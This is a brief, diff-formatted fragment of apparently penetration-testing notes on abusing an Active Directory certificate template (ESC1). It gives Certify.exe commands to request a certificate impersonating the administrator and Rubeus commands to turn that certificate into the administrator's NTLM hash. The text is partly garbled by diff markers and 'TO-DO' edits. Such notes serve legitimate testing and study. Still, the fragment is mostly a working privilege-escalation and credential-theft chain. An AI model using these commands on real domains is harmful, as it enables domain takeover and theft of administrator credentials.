Usage Tips:

 Sample Output:

-5. Request a Cert with Altname
+TO-DO5.
+Request a Cert with Altname

-.\certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator
+.\Certify.exe request /ca:<CA> /template:vuln_esc1 /altname:administrator

 Sample Output:

-6. Get NTLM Hash
+TO-DO6.
+Get NTLM Hash

 .\rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials /show /nowrap